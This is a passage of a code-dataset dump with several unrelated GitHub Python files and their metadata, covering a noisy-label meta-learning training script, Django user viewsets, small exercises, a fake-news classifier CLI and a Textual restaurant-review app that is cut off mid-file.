= grad.detach()\n grad.requires_grad = False\n fast_weights = OrderedDict((name, param - args.fast_lr*grad) for ((name, param), grad) in zip(net.named_parameters(), grads))\n # grads_temp = [grad.detach() for grad in grads]\n # for grad in grads_temp:\n # grad.requires_grad = False\n # fast_weights = OrderedDict((name, param - args.fast_lr*grad) for ((name, param), grad) in zip(net.named_parameters(), grads_temp))\n \n fast_out = net.forward(inputs,fast_weights) \n \n logp_fast = F.log_softmax(fast_out,dim=1)\n \n if args.use_wcl:\n if i == 0:\n consistent_loss = torch.matmul(torch.mean(consistent_criterion(logp_fast,p_tch), dim=1), loss_weights)\n else:\n consistent_loss = consistent_loss + torch.matmul(torch.mean(consistent_criterion(logp_fast,p_tch), dim=1), loss_weights)\n else:\n if i == 0:\n consistent_loss = consistent_criterion(logp_fast,p_tch)\n else:\n consistent_loss = consistent_loss + consistent_criterion(logp_fast,p_tch)\n if args.num_fast > 0:\n meta_loss = consistent_loss*meta_lr/args.num_fast \n meta_loss.backward(retain_graph=True)\n\n ssl_lr = meta_lr\n for i in range(args.num_ssl):\n targets_fast = targets.clone()\n rand_lb_pair = np.random.choice(range(num_class), size=2, replace=True)\n loss_mask = torch.cuda.FloatTensor(num_class).fill_(1.0)\n for idx in rand_lb_pair:\n loss_mask[idx] = 0.0\n # print('targets:', targets)\n # print('rand_lb_pair:', rand_lb_pair)\n # print('loss_mask:', loss_mask)\n idx0 = [idx for idx in range(targets.size(0)) if targets[idx] == rand_lb_pair[0]]\n # idx1 = [idx for idx in range(targets.size(0)) if targets[idx] == rand_lb_pair[1]]\n # print('idx0:', idx0)\n # print('idx1:', idx1)\n for n in range(targets.size(0)):\n if n in idx0:\n targets_fast[n] = rand_lb_pair[1]\n # elif n in idx1:\n # targets_fast[n] = rand_lb_pair[0]\n # print('targets_fast:', targets_fast)\n fast_loss = criterion(outputs,targets_fast)\n grads = torch.autograd.grad(fast_loss, net.parameters(), create_graph=True, retain_graph=True, only_inputs=True)\n for grad in grads:\n grad = grad.detach()\n grad.requires_grad = False\n fast_weights = OrderedDict((name, param - args.fast_lr*grad) for ((name, param), grad) in zip(net.named_parameters(), grads))\n fast_out = net.forward(inputs,fast_weights)\n logp_fast = F.log_softmax(fast_out,dim=1)\n \n kl_div_vector = consistent_criterion(logp_fast,p_tch)\n kl_div_masked = torch.matmul(kl_div_vector, loss_mask)\n \n #### choose one from the following two lines (partial KL or full KL?)\n if args.partial_kl:\n kl_div_reduced = torch.mean(kl_div_masked, dim=0)\n else:\n kl_div_reduced = torch.mean(kl_div_vector)\n \n # rand_lb_pair_ordered = sorted(rand_lb_pair)\n # rand_lb_pair_tuple = (rand_lb_pair_ordered[0], rand_lb_pair_ordered[1])\n rand_lb_pair_tuple = (rand_lb_pair[0], rand_lb_pair[1])\n if epoch > args.kl_epoch:\n if rand_lb_pair_tuple in kl_dict.keys():\n kl_dict[rand_lb_pair_tuple].append(kl_div_reduced.data.item())\n else:\n kl_dict[rand_lb_pair_tuple] = [kl_div_reduced.data.item()]\n if i == 0:\n # ssl_loss = kl_div_reduced\n ssl_loss = torch.mean(kl_div_masked, dim=0)\n else:\n # ssl_loss = ssl_loss + kl_div_reduced\n ssl_loss = ssl_loss + torch.mean(kl_div_masked, dim=0)\n if args.num_ssl > 0:\n meta_loss2 = ssl_loss*ssl_lr/args.num_ssl\n meta_loss2.backward()\n \n optimizer.step() # Optimizer update\n \n # train_loss += class_loss.data[0]\n train_loss += class_loss.data.item()\n _, predicted = torch.max(outputs.data, 1)\n total += targets.size(0)\n correct += predicted.eq(targets.data).cpu().sum()\n \n # sys.stdout.write('\\r')\n # sys.stdout.write('| Epoch [%3d/%3d] Iter[%3d/%3d]\\t\\tLoss: %.4f Acc@1: %.3f%%'\n # # %(epoch, args.num_epochs, batch_idx+1, (len(train_loader.dataset)//args.batch_size)+1, class_loss.data[0], 100.*correct/total))\n # %(epoch, args.num_epochs, batch_idx+1, (len(train_loader.dataset)//args.batch_size)+1, class_loss.data.item(), 100.*correct/total))\n # sys.stdout.flush()\n if batch_idx%10==0:\n print('| Epoch [%3d/%3d] Iter[%3d/%3d]\\t\\tLoss: %.4f Acc@1: %.3f%%'\n %(epoch, args.num_epochs, batch_idx+1, (len(train_loader.dataset)//args.batch_size)+1, class_loss.data.item(), 100.*correct/total))\n if batch_idx%50==0:\n with torch.no_grad():\n val(epoch,batch_idx)\n val_tch(epoch,batch_idx)\n net.train()\n tch_net.train()\n \n \ndef val(epoch,iteration):\n global best\n net.eval()\n val_loss = 0\n correct = 0\n total = 0\n for batch_idx, (inputs, targets) in enumerate(val_loader):\n if use_cuda:\n inputs, targets = inputs.cuda(), targets.cuda()\n inputs, targets = Variable(inputs, volatile=True), Variable(targets)\n outputs = net(inputs)\n loss = criterion(outputs, targets)\n \n # val_loss += loss.data[0]\n val_loss += loss.data.item()\n _, predicted = torch.max(outputs.data, 1)\n total += targets.size(0)\n correct += predicted.eq(targets.data).cpu().sum()\n \n # Save checkpoint when best model\n acc = 100.*correct/total\n # print(\"\\n| Validation Epoch #%d Batch #%3d\\t\\t\\tLoss: %.4f Acc@1: %.2f%%\" %(epoch, iteration, loss.data[0], acc))\n print(\"\\n| Validation Epoch #%d Batch #%3d\\t\\t\\tLoss: %.4f Acc@1: %.2f%%\" %(epoch, iteration, loss.data.item(), acc))\n # record.write('Epoch #%d Batch #%3d Acc: %.2f' %(epoch,iteration,acc))\n # print('Epoch #%d Batch #%3d Acc: %.2f' %(epoch,iteration,acc))\n if acc > best:\n best = acc\n print('| Saving Best Model (net)...')\n save_checkpoint({\n 'state_dict': net.state_dict(),\n 'best_acc': best,\n }, save_point)\n\ndef val_tch(epoch,iteration):\n global best\n tch_net.eval()\n val_loss = 0\n correct = 0\n total = 0\n for batch_idx, (inputs, targets) in enumerate(val_loader):\n if use_cuda:\n inputs, targets = inputs.cuda(), targets.cuda()\n inputs, targets = Variable(inputs, volatile=True), Variable(targets)\n outputs = tch_net(inputs)\n loss = criterion(outputs, targets)\n \n # val_loss += loss.data[0]\n val_loss += loss.data.item()\n _, predicted = torch.max(outputs.data, 1)\n total += targets.size(0)\n correct += predicted.eq(targets.data).cpu().sum()\n \n # Save checkpoint when best model\n acc = 100.*correct/total\n # print(\"| tch Validation Epoch #%d Batch #%3d\\t\\t\\tLoss: %.4f Acc@1: %.2f%%\\n\" %(epoch, iteration, loss.data[0], acc))\n print(\"| tch Validation Epoch #%d Batch #%3d\\t\\t\\tLoss: %.4f Acc@1: %.2f%%\" %(epoch, iteration, loss.data.item(), acc))\n # record.write(' | tchAcc: %.2f\\n' %acc)\n # record.flush()\n # print(' | tchAcc: %.2f\\n' %acc)\n if acc > best:\n best = acc\n print('| Saving Best Model (tchnet)...')\n save_checkpoint({\n 'state_dict': tch_net.state_dict(),\n 'best_acc': best,\n }, save_point)\n\ndef test():\n test_net.eval()\n test_loss = 0\n correct = 0\n total = 0\n for batch_idx, (inputs, targets) in enumerate(test_loader):\n if use_cuda:\n inputs, targets = inputs.cuda(), targets.cuda()\n inputs, targets = Variable(inputs, volatile=True), Variable(targets)\n outputs = test_net(inputs)\n loss = criterion(outputs, targets)\n \n # test_loss += loss.data[0]\n test_loss += loss.data.item()\n _, predicted = torch.max(outputs.data, 1)\n total += targets.size(0)\n correct += predicted.eq(targets.data).cpu().sum()\n test_acc = 100.*correct/total \n print('* Test results : Acc@1 = %.2f%%' %(test_acc))\n # record.write('\\nTest Acc: %f\\n'%test_acc)\n # record.flush()\n # print('\\nTest Acc: %f\\n'%test_acc)\n \ndef float_to_filename(num):\n split_result = str(num).split('.')\n if split_result[0] == '0' and split_result[1] == '0':\n return '00'\n elif split_result[1] == '0':\n return split_result[0]\n else:\n return ''.join(split_result)\n\n# ===============================================\n# record=open('./checkpoint/'+args.id+'.txt','w')\n# record.write('learning rate: %f\\n'%args.lr)\n# record.write('batch size: %f\\n'%args.batch_size)\n# record.write('start iter: %d\\n'%args.start_iter)\n# record.write('mid iter: %d\\n'%args.mid_iter)\n# record.flush()\nprint('learning rate: %f\\n'%args.lr)\nprint('batch size: %d\\n'%args.batch_size)\nprint('number of additional mini-batches: %d\\n'%args.num_fast)\nprint('perturbation ratio: %f\\n'%args.perturb_ratio)\nprint('number of neighbor: %d\\n'%args.num_neighbor)\nprint('ramp-up end epoch of the meta-learning rate: %d\\n'%args.rampup_epoch)\nprint('LR decay epoch: %d\\n'%args.lrdecay_epoch)\n\nif os.path.exists('./checkpoint/%s.pth.tar'%args.mentor_ckpt):\n use_mentor = True\n if os.path.exists('./checkpoint/%s.pth.tar'%args.mentor_ckpt2):\n use_mentor2 = True\n keep_thre1 = float(re.search('2nd([0-9]+)', args.mentor_ckpt2).group(1))*0.1\n keep_thre2 = args.keep_threshold\n used_id = args.id + '_2nd%s_3rd%s' % (float_to_filename(keep_thre1), float_to_filename(keep_thre2))\n else:\n use_mentor2 = False\n keep_thre1 = args.keep_threshold\n used_id = args.id + '_2nd%s' % float_to_filename(keep_thre1)\nelse:\n use_mentor = False\n used_id = args.id\nif args.use_tm:\n used_id = used_id + '_tm'\nsave_point = './checkpoint/%s_%s%s_run%d_M%dS%dn%drho%s.pth.tar'%(used_id,\n args.noise_mode,\n float_to_filename(args.noise_ratio),\n args.run,\n args.num_fast,\n args.num_ssl,\n args.num_neighbor,\n float_to_filename(args.perturb_ratio))\nif args.use_wcl:\n save_point = save_point.replace('.pth.tar', '_w%s.pth.tar' % float_to_filename(args.init_weight))\nif not args.lr == 0.2:\n save_point = save_point.replace('.pth.tar', '_lr%s.pth.tar' % float_to_filename(args.lr))\nif not args.num_epochs == 180:\n save_point = save_point.replace('.pth.tar', '_ep%d.pth.tar' % args.num_epochs)\n\nbest = 0\ninit = True\n# Model\nprint('\\nModel setup')\nprint('| Building net')\nnet = models.PreActResNet32()\ntch_net = models.PreActResNet32()\npretrain_net = models.PreActResNet32()\ntest_net = models.PreActResNet32()\n\nprint('| load pretrain from ./checkpoint/%s.pth.tar'%args.pretrain_ckpt)\npretrain_ckpt = torch.load('./checkpoint/%s.pth.tar'%args.pretrain_ckpt)\npretrain_net.load_state_dict(pretrain_ckpt['state_dict'])\n\nif use_cuda:\n net.cuda()\n tch_net.cuda()\n pretrain_net.cuda()\n test_net.cuda()\n cudnn.benchmark = True\npretrain_net.eval()\n\nif use_mentor:\n loader = dataloader.cifar_dataloader(dataset=args.dataset,\n noise_ratio=args.noise_ratio,\n noise_mode=args.noise_mode,\n batch_size=args.batch_size,\n num_workers=0,\n root_dir=args.data_path,\n # log=stats_log,\n train_val_split_file='%s/train_val_split.json'%args.data_path,\n noise_file='%s/%s%s_run%d.json'%(args.data_path,\n args.noise_mode,\n ''.join(str(args.noise_ratio).split('.')),\n args.run),\n sample_filtering=True)\n filtering_loader = loader.run()\n mentor_net = models.PreActResNet32()\n print('| load mentor model from ./checkpoint/%s.pth.tar' % args.mentor_ckpt)\n mentor_ckpt = torch.load('./checkpoint/%s.pth.tar'%args.mentor_ckpt)\n mentor_net.load_state_dict(mentor_ckpt['state_dict'])\n mentor_net.cuda()\n mentor_net.eval()\n for param in mentor_net.parameters():\n param.requires_grad = False\n keep_idx1 = filtering(keep_thre1)\n print('remove %d samples' % len(filtering_loader.dataset)-len(keep_idx1))\n if use_mentor2:\n mentor_net = models.PreActResNet32()\n print('| load mentor model from ./checkpoint/%s.pth.tar' % args.mentor_ckpt2)\n mentor_ckpt = torch.load('./checkpoint/%s.pth.tar'%args.mentor_ckpt2)\n mentor_net.load_state_dict(mentor_ckpt['state_dict'])\n mentor_net.cuda()\n mentor_net.eval()\n for param in mentor_net.parameters():\n param.requires_grad = False\n keep_idx2 = filtering(keep_thre2)\n newly_removed_idx = [i for i in range(filtering_loader.dataset) if ((i in keep_idx1) and (not i in keep_idx2))]\n print('remove %d additional samples' % len(newly_removed_idx))\n keep_idx = [i for i in keep_idx1 if i in keep_idx2]\n else:\n keep_idx = keep_idx1\nelse:\n print('| no mentor model')\n keep_idx = [] # [Note] empty list: keep all training samples\n\nloader = dataloader.cifar_dataloader(dataset=args.dataset,\n noise_ratio=args.noise_ratio,\n noise_mode=args.noise_mode,\n batch_size=args.batch_size,\n num_workers=0,\n root_dir=args.data_path,\n # log=stats_log,\n train_val_split_file='%s/train_val_split.json'%args.data_path,\n noise_file='%s/%s%s_run%d.json'%(args.data_path,\n args.noise_mode,\n ''.join(str(args.noise_ratio).split('.')),\n args.run),\n keep_idx=keep_idx)\ntrain_loader,val_loader,test_loader = loader.run()\nprint('After sample filtering, len(train_loader.dataset) = %d' % len(train_loader.dataset))\n\nfor param in tch_net.parameters():\n param.requires_grad = False\nfor param in pretrain_net.parameters():\n param.requires_grad = False\n\ncriterion = nn.CrossEntropyLoss()\nsoftmax_dim1 = nn.Softmax(dim=1)\nnll_loss = nn.NLLLoss()\nconsistent_criterion = nn.KLDivLoss(reduction='none')\noptimizer = optim.SGD(net.parameters(), lr=args.lr, momentum=0.9, weight_decay=1e-4)\n\nprint('\\nTraining model')\nprint('| Training Epochs = ' + str(args.num_epochs))\nprint('| Initial Learning Rate = ' + str(args.lr))\n\nnum_class = 10 # [TODO] remove magic number\ntop_k = 5 # [TODO] remove magic number\ntm = np.eye(num_class) # initialize the transition matrix using an identity matrix\nfor epoch in range(1, 1+args.num_epochs):\n # [TODO] remove magic number\n tm_keep_r = 0.99\n kl_dict = {}\n train(epoch, use_mentor)\n # if epoch%2==0:\n # print('\\nTesting model')\n # best_model = torch.load(save_point)\n # test_net.load_state_dict(best_model['state_dict'])\n # with torch.no_grad():\n # test()\n if use_tm and epoch > args.kl_epoch:\n tm_from_kl = np.zeros([num_class,num_class])\n for i in range(num_class):\n for j in range(num_class):\n if (i, j) in kl_dict.keys():\n tm_from_kl[i][j] = np.mean(kl_dict[(i,j)])\n tm_from_kl = np.power(tm_from_kl+1e-10, -float(args.sharpen))\n row_sums = tm_from_kl.sum(axis=1, keepdims=True)\n tm_from_kl = tm_from_kl / row_sums\n tm = tm_keep_r * tm + (1 - tm_keep_r) * tm_from_kl\n# kl_dict_sorted = sorted(kl_dict.items(), key=lambda x: np.mean(x[1]), reverse=True)\n# for i in kl_dict_sorted:\n# print(i[0], np.mean(i[1]))\n# print('kl_dict:')\n# for k, v in kl_dict.items():\n# print(k, v)\n\nif use_tm: \n np.save(save_point.replace('.pth.tar', '_tm.npy'), tm)\n # print(tm)\n print('tm:')\n for i in range(num_class):\n for j in range(num_class):\n print('%.4f' % tm[i][j], end=' ')\n print()\n\n# Run testing only once using the best model\nprint('\\nTesting model')\nbest_model = torch.load(save_point)\ntest_net.load_state_dict(best_model['state_dict'])\nwith torch.no_grad():\n test()\n\n\n# record.close()\n","repo_name":"ckghosted/SLSSL-for-NLL","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":27249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"72242116624","text":"import numpy as np\nfrom ..measurements import Measurements\nfrom . import Track\n\n\nclass Tracks(Measurements):\n def __init__(self):\n super().__init__()\n\n def __repr__(self):\n out = ''\n for track in self:\n out += f'{track.id}: {track}\\n'\n return out\n\n def numpy_to_tracks(self, track_list: np.ndarray, img_w, img_h):\n for track_candidate in track_list:\n x1, y1, x2, y2, track_id, detection_id, score, label_id = track_candidate\n track_candidate = Track(\n xyxy=(x1, y1, x2, y2), \n label_id=int(label_id),\n score=score, \n id=int(track_id), \n detection_id=int(detection_id)\n )\n if track_candidate.is_collision_between_bbox_and_img_border(img_w, img_h):\n continue\n self.append_measurement(track_candidate)\n return self\n\n def append_measurement(self, measurement) -> None:\n self.append(measurement)\n\n def get_world_positions(self):\n positions = []\n for track in self:\n positions.append(track.world_position)\n return positions\n","repo_name":"Sntz91/ipm_evaluation","sub_path":"fivesafe/image_tracking/tracks.py","file_name":"tracks.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"11928765740","text":"from backend.apps.accounts.serializers import UserSerializer\nfrom backend.apps.accounts.models import User\nfrom backend.apps.api.api.serializers import SerializerByMethodViewSetMixin, EmptySerializer\nfrom backend.apps.accounts.serializers import RegisterSerializer\n\nfrom django.contrib.auth import get_user_model\nfrom rest_framework import viewsets, status\nfrom rest_framework.permissions import AllowAny, IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import action\n\n\nfrom drf_spectacular.utils import (\n extend_schema,\n)\n\nclass AuthViewSet(\n SerializerByMethodViewSetMixin,\n viewsets.GenericViewSet,\n):\n \"\"\"\n A viewset that provides the Auth standard actions\n \"\"\"\n\n permission_classes = [\n AllowAny,\n ]\n serializer_class = EmptySerializer\n serializer_classes = {\n \"register\": RegisterSerializer,\n }\n queryset = get_user_model().objects.none()\n\n @extend_schema(\n summary=\"Adds a new user\",\n description=\"Take a set of values and creates user account and returns user account details\",\n responses={201: RegisterSerializer},\n )\n @action(detail=False, methods=[\"POST\"])\n def register(self, request):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n user = serializer.save()\n return Response(\n self.get_serializer(user).data, status=status.HTTP_201_CREATED\n )\n\nclass UserViewSet(\n SerializerByMethodViewSetMixin,\n viewsets.ModelViewSet,\n):\n permission_classes = [IsAuthenticated]\n queryset = User.objects.all()\n serializer_class = UserSerializer\n serializer_classes = {\n \"me\": UserSerializer,\n }\n http_method_names = [\"get\", \"head\", \"put\", \"patch\", \"options\"]\n\n @action(detail=False, methods=[\"GET\"])\n def me(self, request):\n return Response(self.get_serializer(request.user).data)\n","repo_name":"Rashmichaturvedi94/ESS","sub_path":"backend/backend/apps/accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"14373768610","text":"# -*- coding: utf-8 -*-\nimport math\nimport heapq\nimport sys\nimport itertools\nfrom collections import deque\n\nsys.setrecursionlimit(1000000)\nMOD = 10 ** 9 + 7\nn, p = map(int, input().split())\n\n\ndef prime_f_multi(n, num):\n ans = 1\n divisors = {}\n for i in range(2, num):\n k = 0\n while (num % i) == 0:\n k += 1\n num //= i\n if k != 0 and k // n > 0:\n ans *= i * (k // n)\n if not divisors and num != 1:\n divisors[num] = 1\n return ans\n\n\nprint(prime_f_multi(n, p))\n","repo_name":"katataku/atcoder","sub_path":"VirtualContest/Piscine/A06/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"16551719186","text":"def discount(quantity, price, discountrate):\n Total = quantity * price\n discountamount = discountrate * Total\n discountprice = Total - discountamount\n\n return discountamount, discountprice\n\n\n\n\n\n\n\nquantity = float(input(\"Enter the quantity: \"))\nprice = float(input(\"Enter the unit price: $ \"))\ndiscountrate = float(input(\"Enter the discount rate: % \"))\ndiscountamount,discountprice = discount(quantity, price, discountrate)\n\nprint(\"Quantity: \", quantity)\nprint(\"Unit Price: $ \", price)\nprint(\"Discounted Amount: $ \", discountamount)\nprint(\"Discounted Price: $ \", discountprice)","repo_name":"mannandesai1/CIS106W65","sub_path":"ps9p1.py","file_name":"ps9p1.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"5624110586","text":"import numpy as np\nimport torch\nimport torch.nn as nn\n\n\nclass PositionEmbedding(nn.Module):\n def __init__(self, max_len=11, emb_dim=32, n_vocab=27):\n super().__init__()\n pos = np.expand_dims(np.arange(max_len), 1) # [max_len, 1]\n pe = pos / np.power(1000, 2 * np.expand_dims(np.arange(emb_dim) // 2, 0) / emb_dim) # [max_len, emb_dim]\n pe[:, 0::2] = np.sin(pe[:, 0::2])\n pe[:, 1::2] = np.cos(pe[:, 1::2])\n pe = np.expand_dims(pe, 0) # [1, max_len, emb_dim]\n self.pe = torch.from_numpy(pe).type(torch.float32)\n self.embeddings = nn.Embedding(n_vocab, emb_dim)\n self.embeddings.weight.data.normal_(0, 0.1)\n\n def forward(self, x):\n device = self.embeddings.weight.device\n self.pe = self.pe.to(device)\n x_embed = self.embeddings(x.long())\n x_embed = x_embed + self.pe # [n, step, emb_dim]\n return x_embed # [n, step, emb_dim]\n\n\nif __name__ == '__main__':\n import data\n\n print(PositionEmbedding()(data.get_sample()[0]).shape)","repo_name":"lansinuote/NLP-Toturials","sub_path":"11.transfomer/position.py","file_name":"position.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"47"} +{"seq_id":"74439171663","text":"from __future__ import print_function\n\nfrom shallow import ShallowLearner\nfrom deep import DeepLearner\n\nimport pandas as pd\nimport numpy as np\nimport plots\nimport os\n\ndef main():\n \"\"\"Displays a CLI to display the execution process and results of the various classifiers.\"\"\"\n print(\"This is the 'Big Data' summative assignment for Z0954757.\")\n print()\n # Perform analysis for the Shallow Learning Intitial Investiagtion\n shallow_initial = raw_input(\n \"Would you like to run the initial investigations for the shallow learning approaches (Estimated time to complete: 3 minutes)? (y/n)\"\n )\n if 'y' in shallow_initial.lower():\n # Create an instance of the ShallowLearner class\n shall = ShallowLearner()\n # Get the data for use in the shallow appraches\n shall.get_data(os.path.join('datasets','news_ds.csv'))\n # Try the first approach\n first_results = shall.first_approach()\n print(first_results)\n # Try the second approach\n second_results = shall.second_approach()\n print(second_results)\n # Try the third approach\n third_results = shall.third_approach()\n print(third_results)\n # Try the fourth approach\n fourth_results = shall.fourth_approach()\n print(fourth_results)\n\n\n # Perform analysis for the Shallow Learning Further Investigations\n shallow_further = raw_input(\n \"Would you like to run the further investigations for the shallow learning approaches? (y/n)\"\n )\n if 'y' in shallow_further.lower():\n load_data = raw_input(\n \"Type 'load' to load pre-existing data or nothing to regenerate the data (Estimated time to regenerate: 90 minutes)\"\n )\n if 'load' in load_data.lower():\n #Load data from csv files.\n plots.plot_grid_search(os.path.join('saves','ThirdApproachVariations.csv'), ' Third Approach - TF-IDF Grid Search Optimisation')\n plots.plot_grid_search(os.path.join('saves','FourthApproachVariations.csv'), ' Fourth Approach - N-gram (1,2) Grid Search Optimisation')\n else:\n print(\"Regenerating data.\")\n\n # Create an instance of the ShallowLearner class\n shall = ShallowLearner()\n # Get the data for use in the shallow appraches\n shall.get_data(os.path.join('datasets','news_ds.csv'))\n # Create arrays of test values for splits and max features.\n splits = np.arange(0.2, 1, 0.2)\n max_feats = np.arange(1000, 21000, 2000)\n\n print(\"Test splits: \", splits)\n print(\"Test maximum features: \", max_feats)\n\n # Intialise a dictionary to collect the results.\n third_results_dict = {\n 'splits' : [],\n 'no feats' : [],\n 'Accuracy': [],\n 'Precision' : [],\n 'Recall':[],\n 'F1':[]\n }\n\n print(\"Varying splits and max features for approach three.\")\n for test_split in splits:\n print(\"Testing at split: \", test_split)\n for features in max_feats:\n print(\"Testing at max features: \", features)\n results = shall.third_approach(split=test_split, no_features=features)\n third_results_dict['splits'].append(test_split)\n third_results_dict['no feats'].append(features)\n third_results_dict['Accuracy'].append(results['Accuracy'])\n third_results_dict['Precision'].append(results['Precision'])\n third_results_dict['Recall'].append(results['Recall'])\n third_results_dict['F1'].append(results['F1'])\n\n third_results_df = pd.DataFrame(third_results_dict)\n third_results_df.to_csv(os.path.join('saves','ThirdApproachVariationsRegen.csv'))\n\n # Vary n-gram format in approach four\n print(\"Varying n-gram range for approach four.\")\n n_gram_ranges = [(1,1),(2,2), (3,3), (1,2), (1,3)]\n fourth_n_gram_results_dict = {\n 'n_gram_range' : [],\n 'Accuracy': [],\n 'Precision' : [],\n 'Recall':[],\n 'F1':[]\n }\n\n for n_range in n_gram_ranges:\n print(\"Testing n gram range: \", n_range)\n results = shall.fourth_approach(n_range)\n fourth_n_gram_results_dict['n_gram_range'].append(n_range)\n fourth_n_gram_results_dict['Accuracy'].append(results['Accuracy'])\n fourth_n_gram_results_dict['Precision'].append(results['Precision'])\n fourth_n_gram_results_dict['Recall'].append(results['Recall'])\n fourth_n_gram_results_dict['F1'].append(results['F1'])\n\n fourth_n_gram_results_df = pd.DataFrame(fourth_n_gram_results_dict)\n fourth_n_gram_results_df.to_csv(os.path.join('saves','FourthApproachNGramsRegen.csv'))\n\n # Intialise a dictionary to collect the results.\n fourth_results_dict = {\n 'splits' : [],\n 'no feats' : [],\n 'Accuracy': [],\n 'Precision' : [],\n 'Recall':[],\n 'F1':[]\n }\n\n print(\"Varying splits and max features for approach three.\")\n for test_split in splits:\n print(\"Testing at split: \", test_split)\n for features in max_feats:\n print(\"Testing at max features: \", features)\n results = shall.fourth_approach(n_range=(1,2), split=test_split, no_features=features)\n fourth_results_dict['splits'].append(test_split)\n fourth_results_dict['no feats'].append(features)\n fourth_results_dict['Accuracy'].append(results['Accuracy'])\n fourth_results_dict['Precision'].append(results['Precision'])\n fourth_results_dict['Recall'].append(results['Recall'])\n fourth_results_dict['F1'].append(results['F1'])\n\n fourth_results_df = pd.DataFrame(fourth_results_dict)\n fourth_results_df.to_csv(os.path.join('saves','FourthApproachVariationsRegen.csv'))\n\n\n plots.plot_grid_search(os.path.join('saves','ThirdApproachVariationsRegen.csv'), ' Third Approach - TF-IDF Grid Search Optimisation')\n plots.plot_grid_search(os.path.join('saves','FourthApproachVariationsRegen.csv'), ' Fourth Approach - N-gram (1,2) Grid Search Optimisation')\n # Perform analysis for the Deep Learning Investigation\n deep_analysis = raw_input(\n \"Would you like to run the analysis for the deep learning approach? (y/n)\"\n )\n if 'y' in deep_analysis.lower():\n # Create an instance of the DeepLearner class\n deep = DeepLearner()\n # Get the data for the deep approach\n deep.get_data(os.path.join('datasets','news_ds.csv'))\n # Try the LSTM approach\n results = deep.lstm_approach()\n print(results)\n\n print(\"Closing CLI.\")\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"JRhodes95/big-data-cw","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"5588024171","text":"from textual.app import App, ComposeResult\nfrom textual.screen import Screen\nfrom textual.widgets import Header, Footer, Button, Static, Input, DataTable, ContentSwitcher\nfrom textual.containers import Container, Horizontal\nfrom db.models import Town, Restaurant, Review\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\n\n#Define needed widgets / overall functions\n# Main Page, All Data Page, Relation Page, Add Page\n# Main Page\n# Will ask for user login, greet, and display page options as well as quit option\n# Data Page\n# Will list available data categories and display data upon request, has back button\n# Relation Page\n# Will list available data categories and display data updon request, has back button\n# Add Page \n# Will list available data categories, provide form to add to each category, handle adding and updating database, refresh, display updated data, has back button\n\n\nclass Model:\n # towns = []\n # restaurants = []\n # reviews = []\n def __init__(self):\n engine = create_engine('sqlite:///db/thirddb.db')\n Session = sessionmaker(bind=engine)\n self.session = Session()\n self.towns = [town for town in self.session.query(Town)]\n self.restaurants = [rest for rest in self.session.query(Restaurant)]\n self.reviews = [rev for rev in self.session.query(Review)]\n\n\nclass LoginPage(Screen):\n \"\"\"Main Page\"\"\"\n\n def compose(self):\n yield Header(show_clock=True)\n yield Footer()\n yield Input(placeholder=\"Username\", id=\"username\")\n yield Button(\"Log In\", id=\"submit\", variant=\"success\")\n\n def on_button_pressed(self, event:Button.Pressed) -> None:\n inp = self.query_one('#username').value\n self.set_name(inp)\n self.app.push_screen(\"Menu\")\n \n def set_name(self, name):\n CLI.data[\"username\"] = name\n\n\nclass MainPage(Screen):\n \"\"\"Test Page\"\"\"\n\n BINDINGS=[('q', \"pop_screen()\", \"Log Out\"), ('z', \"ret()\", \"Raw Data\"), ('x', \"rel()\", \"Relative Data\"), ('c', \"add\", \"Add Data\")]\n\n\n def compose(self):\n name = self.get_name()\n yield Header(show_clock=True)\n yield Footer()\n with Container():\n yield Static(f\"Welcome, {name}\", id=\"welcome\", classes=\"title\")\n with Horizontal():\n yield Button(\"Retrieve Data Lists\", id=\"dataButton\")\n yield Button(\"View Relationship\", id=\"relationButton\")\n yield Button(\"Add Data\", id=\"addButton\")\n def get_name(self):\n name = CLI.data[\"username\"]\n if len(name) > 0:\n return name\n else: \n return \"Guest\"\n \n def on_button_pressed(self, event:Button.Pressed):\n if event.button.id == \"dataButton\":\n app.push_screen('Retrieve')\n elif event.button.id == \"relationButton\":\n app.push_screen(\"Relative\")\n elif event.button.id == \"addButton\":\n app.push_screen(\"Add\")\n\n def action_ret(self):\n app.push_screen('Retrieve')\n def action_rel(self):\n app.push_screen(\"Relative\")\n def action_add(self):\n app.push_screen(\"Add\")\n \n\n \n\nclass RetrievePage(Screen):\n\n BINDINGS=[('q', \"pop_screen()\", \"Go Back\"), ('t', 'get_towns()', 'Town Data'), ('r', 'get_rest()', 'Restaurant Data'), ('v', 'get_rev()', 'Review Data')]\n\n def compose(self):\n yield Header(show_clock=True)\n yield Footer()\n yield Static(\"Raw Data Page\", classes=\"title\")\n with Container(id=\"buttons\"):\n yield Button(\"Raw Towns\", id=\"town\")\n yield Button(\"Raw Restaurants\", id=\"rest\")\n yield Button(\"Raw Reviews\", id=\"rev\")\n yield Container(id=\"target\")\n yield Static(id=\"retrieved\")\n\n def on_button_pressed(self, event:Button.Pressed):\n if event.button.id == 'town':\n self.action_get_towns()\n elif event.button.id == 'rest':\n self.action_get_rest()\n elif event.button.id == 'rev':\n self.action_get_rev()\n\n def action_get_towns(self):\n self.query_one(\"#retrieved\").remove()\n towns = CLI.model.towns\n table = DataTable(id=\"retrieved\", name=\"Container\", zebra_stripes=True)\n table.add_columns(\"ID\", \"Town Name\", \"State\", f\"Length: 